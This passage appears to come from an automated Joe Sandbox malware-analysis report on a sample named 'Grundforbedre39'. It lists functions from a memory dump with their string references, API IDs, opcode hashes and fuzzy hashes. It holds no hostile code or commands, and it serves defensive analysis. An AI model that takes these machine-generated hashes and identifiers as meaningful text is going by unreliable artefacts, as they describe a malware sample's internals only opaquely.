                                                                                      • Instruction Fuzzy Hash: C8319C31301B02AFEB459F25C990E8ABBB6BF84754F404155E90557A60EBB0FA21CFC0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3558E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: Legacy$UEFI
                                                                                      • API String ID: 2994545307-634100481
                                                                                      • Opcode ID: 250b0005dc8f2492c8a2c71c906d30d517eca2a22daf5242556bfccd636c6f9f
                                                                                      • Instruction ID: d9792a56e6e352f435d9a59b9f28e1a3a4ef9f1ebfd7b53f822ed87ea62daacf
                                                                                      • Opcode Fuzzy Hash: 250b0005dc8f2492c8a2c71c906d30d517eca2a22daf5242556bfccd636c6f9f
                                                                                      • Instruction Fuzzy Hash: DA616AB1B443099FEB15CFA8C840AAEBBB9FF48740F50446EE549EB251EB31E905CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355EB55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 355EB5C4
                                                                                      • RedirectedKey, xrefs: 355EB60E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                      • API String ID: 0-1388552009
                                                                                      • Opcode ID: c8636b4bf5698a33e09bf6e4f099a0714c49755c0eb737e1ce44e1a05ff19900
                                                                                      • Instruction ID: d98ceddf6a0fabf47d100424f8b4fcaa68d2fd0deaed36e7be1c6dc8a1cc3dc2
                                                                                      • Opcode Fuzzy Hash: c8636b4bf5698a33e09bf6e4f099a0714c49755c0eb737e1ce44e1a05ff19900
                                                                                      • Instruction Fuzzy Hash: 6B6107B5C11219EFDB15CFD4D988ADEBBB9FB08721F50406AF405A7240EB349A45CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3552F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$$
                                                                                      • API String ID: 3446177414-233714265
                                                                                      • Opcode ID: 6d870030308caabb0f6163cc283ec5cf53d856feaec5a90c6ddcc73e4d178602
                                                                                      • Instruction ID: 7a71c3eb1a994553b8195d3c11115c041a84a5530e5cec2e40f5f7b712ae6c97
                                                                                      • Opcode Fuzzy Hash: 6d870030308caabb0f6163cc283ec5cf53d856feaec5a90c6ddcc73e4d178602
                                                                                      • Instruction Fuzzy Hash: 6261DBB5A04749DFEB20CFA4E592B9DBBB2FF84304F504469D505AB690CB74B981CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355A314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                      • API String ID: 0-118005554
                                                                                      • Opcode ID: da0bc33f27bbc7db498747412564cbb05721973748391d84ac583ddf664fabab
                                                                                      • Instruction ID: 619185d64be27cac606cf3486cc509c6c1a823f0576dc7b40dcf10d4fb5b8e91
                                                                                      • Opcode Fuzzy Hash: da0bc33f27bbc7db498747412564cbb05721973748391d84ac583ddf664fabab
                                                                                      • Instruction Fuzzy Hash: FD31FC762087408BD302CBA8D840B1EB3E4FFD5768F520869ED558B380EB30E905CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355106CF Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: P5$ P5
                                                                                      • API String ID: 0-2085283074
                                                                                      • Opcode ID: acf18f896da5f6a630bdf27d34def441a80a72c04febda0b6eedcfc7e937c85e
                                                                                      • Instruction ID: 27b7fc2361d846b36590151574b2b40843fa3c5f30fdad491a81653813807866
                                                                                      • Opcode Fuzzy Hash: acf18f896da5f6a630bdf27d34def441a80a72c04febda0b6eedcfc7e937c85e
                                                                                      • Instruction Fuzzy Hash: AB31B4376057119BEB12DE158898E6BBBA6BFC46A0F014929FC1597220EB30FD05CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355431BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$InW5
                                                                                      • API String ID: 0-2378685478
                                                                                      • Opcode ID: bbccf482addf0cabf651ea4d3929480c51d37387f80557514dca6e2b4d69adf4
                                                                                      • Instruction ID: dbab8f6a13298b8e73d3d3999f6ba9ab915dedfba3ef810cfb3869b1916b730f
                                                                                      • Opcode Fuzzy Hash: bbccf482addf0cabf651ea4d3929480c51d37387f80557514dca6e2b4d69adf4
                                                                                      • Instruction Fuzzy Hash: CE316CB664D301AFD311CF68C880A5BBBE8FB95654F81092EF99583260D734ED498BD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355433D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3558289F
                                                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 3558289A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                      • API String ID: 0-2653619699
                                                                                      • Opcode ID: 84a94399aeb6616e582f742ad551d82176b71ece1df19037e6152d364763740e
                                                                                      • Instruction ID: 627b7a414b7be960502e16131673f6168f000697cf82c96badf1709566577065
                                                                                      • Opcode Fuzzy Hash: 84a94399aeb6616e582f742ad551d82176b71ece1df19037e6152d364763740e
                                                                                      • Instruction Fuzzy Hash: 921129B2B04304FBFB198A48CD45F9F7AA9EB94750F918069B904DB284DA74ED4087A0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3558D69D Relevance: 2.6, Strings: 2, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: InW5$InW5
                                                                                      • API String ID: 0-3502319029
                                                                                      • Opcode ID: e25f0e16ed09ab4140bf669585f869e90f104a84defb850251f8a1ff9e05b3cf
                                                                                      • Instruction ID: f5bf07beef21f357b8703ef4ccf78b5fcca9d0d9f20de729ff58ac509c3db422
                                                                                      • Opcode Fuzzy Hash: e25f0e16ed09ab4140bf669585f869e90f104a84defb850251f8a1ff9e05b3cf
                                                                                      • Instruction Fuzzy Hash: 9211E172600208BFC7058F6CD8809BEBBB9EF99354F60846AF844CB250DA31ED55C7A4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3554A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                      • API String ID: 2994545307-4008356553
                                                                                      • Opcode ID: 55a1c0fdf88a7143cdea9ce071a7936021268f39f3ef08f289d768e164b43cd0
                                                                                      • Instruction ID: 1d72ecfe00a8f43b71814b4005a6762a3f801a4da418cff41c20e07bdc24ff91
                                                                                      • Opcode Fuzzy Hash: 55a1c0fdf88a7143cdea9ce071a7936021268f39f3ef08f289d768e164b43cd0
                                                                                      • Instruction Fuzzy Hash: F901F4B2124784AFE311DF14CE06B5677F8E780716F018979EA5CC7590EB74E914CB86
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3551C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: MUI
                                                                                      • API String ID: 0-1339004836
                                                                                      • Opcode ID: 654a5ec8b771315e16cf6dcf09949095d229a848f6950833712fdd74f2f49e74
                                                                                      • Instruction ID: 8296e4af3e288dc628c70f6eeb9484a7f5a7b68ff14a0e5b6f3f4efdac55331e
                                                                                      • Opcode Fuzzy Hash: 654a5ec8b771315e16cf6dcf09949095d229a848f6950833712fdd74f2f49e74
                                                                                      • Instruction Fuzzy Hash: 5F825CB9E003189BFF15CFA9C881B9DBBB1BF48350F518569DC19AB250DB71AE81CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3553B1E0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @[`5@[`5
                                                                                      • API String ID: 0-3303779981
                                                                                      • Opcode ID: 41a5e42a9a733ec866d69c776018fd951d8bd996ee2e9d9493eb9e55c9742849
                                                                                      • Instruction ID: 022c4a161f4cf8588754448f32074bd18d04d190310b4b01b439b71eec652cb4
                                                                                      • Opcode Fuzzy Hash: 41a5e42a9a733ec866d69c776018fd951d8bd996ee2e9d9493eb9e55c9742849
                                                                                      • Instruction Fuzzy Hash: 9032D7B5E05219DFDF14CFA8C841BAEBBB1FF84764F540529E80AAB350E775A901CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3553E507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6502fc8d0f228a46685a8a0413049e08ee008a7fe184e5faa7ab281f9646726a
                                                                                      • Instruction ID: bc38674068c854023421ae02cd3473905f9380c65c6bbe67b427ec2d36f8ed92
                                                                                      • Opcode Fuzzy Hash: 6502fc8d0f228a46685a8a0413049e08ee008a7fe184e5faa7ab281f9646726a
                                                                                      • Instruction Fuzzy Hash: 2DA11F71E45718AFEB11CBA4C845F9EBBF5BF44764F010526E925AB290DB74B840CBC1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35511051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 715b9dff5fcd505333a1516bb35377b48367071b243d53ace9f9c20027702e78
                                                                                      • Instruction ID: 0bbc402ee737b4c7cd83b4c63930de7fb1611ab05afe2cfdfadd97d6af58a1a7
                                                                                      • Opcode Fuzzy Hash: 715b9dff5fcd505333a1516bb35377b48367071b243d53ace9f9c20027702e78
                                                                                      • Instruction Fuzzy Hash: 12B102B5A093809FD754CF28C480A5AFBF1BF88308F54596EE899CB351D771E945CB82
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3551254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: cc814594c8e8e743af58873d0a14eb44dc217281979eb553c8ac2fcba90ae77b
                                                                                      • Instruction ID: b5be2f5d75cf3baf455447a37c36decf5195ddf8e30a17bfb9592bc1ba9981e5
                                                                                      • Opcode Fuzzy Hash: cc814594c8e8e743af58873d0a14eb44dc217281979eb553c8ac2fcba90ae77b
                                                                                      • Instruction Fuzzy Hash: 2141C275A05704CFEB14CF25D990A49BBF2FF84354F91869AC8069B6A0DF30BA81CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35514779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 5398edcff0d7f71d017640a1e4262ac06ae0b924a4efab7f2a84d1d28782f9c7
                                                                                      • Instruction ID: 8dcc90f56a3817d3ee97fda682be9c6a02907d4ecbd3a78b73c1d90e71b4abb7
                                                                                      • Opcode Fuzzy Hash: 5398edcff0d7f71d017640a1e4262ac06ae0b924a4efab7f2a84d1d28782f9c7
                                                                                      • Instruction Fuzzy Hash: CF41A075614341DFEB14CF28D894F2ABBE6BF81352F505829E942872A0DF70EA41CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550B420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 27a2e72b86b4360a1cbe2e499818ad42467fb19f1ce111e97e7e69e7d4543179
                                                                                      • Instruction ID: a4e82299bfd7b2257dd523c95319fb904d7d435e79a3c98c8338d039fc7cbf15
                                                                                      • Opcode Fuzzy Hash: 27a2e72b86b4360a1cbe2e499818ad42467fb19f1ce111e97e7e69e7d4543179
                                                                                      • Instruction Fuzzy Hash: 5D31DF76600608AFC711CF14C880E5A77B6FF85368F514269E9459B2A1DB71FE42CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355156E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: dd5c7a6de23c05250d9c7823843e6e4e2edb167549a2b60ef994342f6c57a422
                                                                                      • Instruction ID: 97370b704da9795be42c947b52830c1aad4571e92deb6fde2f4898f8ffc4382b
                                                                                      • Opcode Fuzzy Hash: dd5c7a6de23c05250d9c7823843e6e4e2edb167549a2b60ef994342f6c57a422
                                                                                      • Instruction Fuzzy Hash: BF31693A715A05EFEB459F24CA90E8ABBA6FF84290F905055ED0197B60DB71F931CF80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355BE750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 75ffcb44090a3c8d2a98ae1959754ff74fe979f5fcf658cba19ac81b3ba33f51
                                                                                      • Instruction ID: c4a293247d64bc154982cbb7c5e78cdeadb69f1cb78a5e02882decb0bab2cd07
                                                                                      • Opcode Fuzzy Hash: 75ffcb44090a3c8d2a98ae1959754ff74fe979f5fcf658cba19ac81b3ba33f51
                                                                                      • Instruction Fuzzy Hash: D33178B5A493019FCB08CF18C44495ABBF2FF89254F4989AEF4889B251D770E906CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35513536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 284704164ec389f57401fa8faedf38428a668eb394df4a8345d484d532383c8a
                                                                                      • Instruction ID: e09d91657ef21eefcb352b750230244f8a80e350ebafac256b9833f8fe943831
                                                                                      • Opcode Fuzzy Hash: 284704164ec389f57401fa8faedf38428a668eb394df4a8345d484d532383c8a
                                                                                      • Instruction Fuzzy Hash: F221BF356096449FEB219F04C994B1ABFE2FBD0B61F830559EC424B681CB70FA48CBD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3559A130 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 28083e40c06469682bbf277707ab0d7141f48760cdbd07670634743a47b1b13b
                                                                                      • Instruction ID: e396e97a76f1d0534a73a5ed9aa927ee5151dba2f0fa3eba27c57a5d61a034f7
                                                                                      • Opcode Fuzzy Hash: 28083e40c06469682bbf277707ab0d7141f48760cdbd07670634743a47b1b13b
                                                                                      • Instruction Fuzzy Hash: 1301973A210219ABDF028F84DC40ECA3F66FB4C794F468101FE1866220CB36E971EF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3554A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: GlobalTags
                                                                                      • API String ID: 0-1106856819
                                                                                      • Opcode ID: 0ad1320d46581ba4a262036c2b8ba8461ab00f0fcc4a9f5a073637e411911cc5
                                                                                      • Instruction ID: 3f68c05382ec0e086e408cc55a72913e4836a3312b540b5d9f8c97b816e02561
                                                                                      • Opcode Fuzzy Hash: 0ad1320d46581ba4a262036c2b8ba8461ab00f0fcc4a9f5a073637e411911cc5
                                                                                      • Instruction Fuzzy Hash: A27180B8F0625D9FEF14CF99D580BDDB7B2BF58350F50852AE805A7244DB71A901CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355202F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #%u
